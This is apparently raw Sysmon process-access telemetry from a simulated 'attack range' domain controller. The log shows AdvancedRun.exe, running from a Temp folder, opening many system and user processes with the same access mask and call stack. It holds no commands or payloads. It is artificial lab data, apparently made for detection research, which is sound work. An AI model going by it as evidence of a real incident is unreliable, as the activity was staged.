10341000x80000000000000004075359Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.069{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.068{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.068{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075356Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.068{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.068{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075354Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.067{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075353Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.067{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.067{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.067{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.067{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.066{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.066{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.065{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.065{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075345Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.065{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.065{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.065{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075342Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 